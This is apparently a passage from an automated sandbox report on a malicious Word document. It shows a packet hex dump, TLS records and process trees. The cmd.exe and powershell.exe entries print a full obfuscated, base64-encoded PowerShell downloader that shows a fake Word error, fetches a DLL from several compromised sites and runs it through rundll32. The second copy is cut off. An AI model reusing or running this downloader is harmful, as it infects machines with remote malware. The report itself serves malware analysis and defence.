84 e1 51 23 cb bc f3 58 86 78 de 32 f8 cf f8 5b 68 ab ef 06 7a 3f 17 88 19 8a 5e fb 0e 7c 5b 8d 9a 26 6f 5d c2 a4 c6 7c fd a1 e2 fa ab 47 ba 44 4e 15 14 ee c1 a8 14 8e 32 d9 43 50 7b 48 cc 42 89 fd 58 4e 0a 64 e0 ba 43 77 9e 7d 1d c9 45 9a 15 de f9 32 5b 5e fa 32 0b de ac 09 7c d5 1e aa 6f c0 71 ac 1e c4 e9 76 de 35 56 d7 7b 21 89 b4 7a 74 88 8a 9c 08 8f 96 3d ad f0 63 14 b1 24 20 28 7b 57 bd 87 95 b6 6d 94 22 5e e7 61 d7 96 97 6e 36 d4 d4 83 fc 71 37 7f 53 4d 7a 1d 22 e4 f0 00 a9 8a 32 15 a8 b4 9a b9 6f c0 d7 df 4e ca 32 61 aa e9 20 4a ad 60 c4 f9 48 43 08 74 8d d4 4d 24 ff b5 ca f1 c4 aa 85 89 9b 2f 28 b5 7a 19 ab 56 63 42 9d de 99 47 15 58 e2 73 5a a4 5b 24 e7 f1 0f 85 a8 28 36 87 4e 7d a5 dc 15 7a ef 50 4d 28 4c 3a dc a3 00 4d c8 01 83 2b 02 57 63 ed 01 e7 bd 98 39 dd 97 92 10 a4 b0 9c 1d 91 85 45 78 cd 6e d8 85 78 f0 93 a0 60 2c b3 d3 9a 31 49 b7 e4 d0 f6 c9 be e2 9f 0e 0a da e9 d2 6a e8 c9 be e8 d8 f8 dc 69 e2 13 0d 43 7b db e4 4c 7e e4 45 d7 63 f5 ae 31 d2 0a e6 47 02 98 ae 17 e4 05 b1 20 a8 86 32 2a 7a c4 63 30 91 e6 96 04 62 cf cd e7 74 42 41 e7 44 4d e0 e3 43 a0 e1 69 22 5a 48 f8 a4 e4 46 36 e0 41 c1 1e 09 b1 92 31 9b 61 80 0e 4c 98 11 3b 6d 1e 68 35 05 11 9e e0 53 d7 18 1b 24 90 a8 08 ed 8c 41 45 66 b3 7f 97 a6 97 4c 99 7f 69 31 b1 28
                                                                                                                              Data Ascii: f34`k{raLsB|C&;8=)h&F1Rj)5}$a/* Y"#R~CHs!}V1'*R`MN]9@M+EeKv3pL'[oM+qGbc%UB.B%6.*Ag![!JaFx,ab;T%8Uy(3tX)}{Rh#)@Q^DVQD[,ns4PHJS:Wqm:nn"\rGz{pKTl|"nGg|C\];U`\aV8$E=R;O[s`uzo-%n\bw,jh7*6~yM9m7hCij9=Nu4rA0Y54X6bt2qr>#f)VJJK*7mz\3D}&gD6~@]O*g=H#wGRTj-btPk]u&lu<YG_%]?0=_qr5jWGCMGQ#Xx2[hz?^|[&o]|GDN2CP{HBXNdCw}E2[^2|oqv5V{!zt=c$ ({Wm"^an6q7SMz"2oN2a J`HCtM$/(zVcBGXsZ[$(6N}zPM(L:M+Wc9Exnx`,1IjiC{L~Ec1G 2*zc0btBADMCi"ZHF6A1aL;mh5S$AEfLi1(


                                                                                                                              HTTPS Packets

                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                              Feb 1, 2021 23:25:15.906698942 CET194.209.195.106443192.168.2.449742CN=physio-svdh.ch CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 02 17:26:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 02 18:26:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                              Feb 1, 2021 23:25:17.220958948 CET35.208.182.43443192.168.2.449744CN=isatechnology.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 15 19:51:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 15 20:51:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              Analysis Process: WINWORD.EXE PID: 4180 Parent PID: 800

                                                                                                                              General

                                                                                                                              Start time:23:25:04
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                              Imagebase:0x1d0000
                                                                                                                              File size:1937688 bytes
                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: cmd.exe PID: 5632 Parent PID: 5060

                                                                                                                              General

                                                                                                                              Start time:23:25:08
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                                                                                                                              Imagebase:0x7ff622070000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: conhost.exe PID: 5620 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Analysis Process: msg.exe PID: 6068 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:09
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\msg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                                                              Imagebase:0x7ff79a800000
                                                                                                                              File size:26112 bytes
                                                                                                                              MD5 hash:EEB395D8DD3C1D6593903BD640687948
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              Analysis Process: powershell.exe PID: 1320 Parent PID: 5632

                                                                                                                              General

                                                                                                                              Start time:23:25:10
                                                                                                                              Start date:01/02/2021
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnAC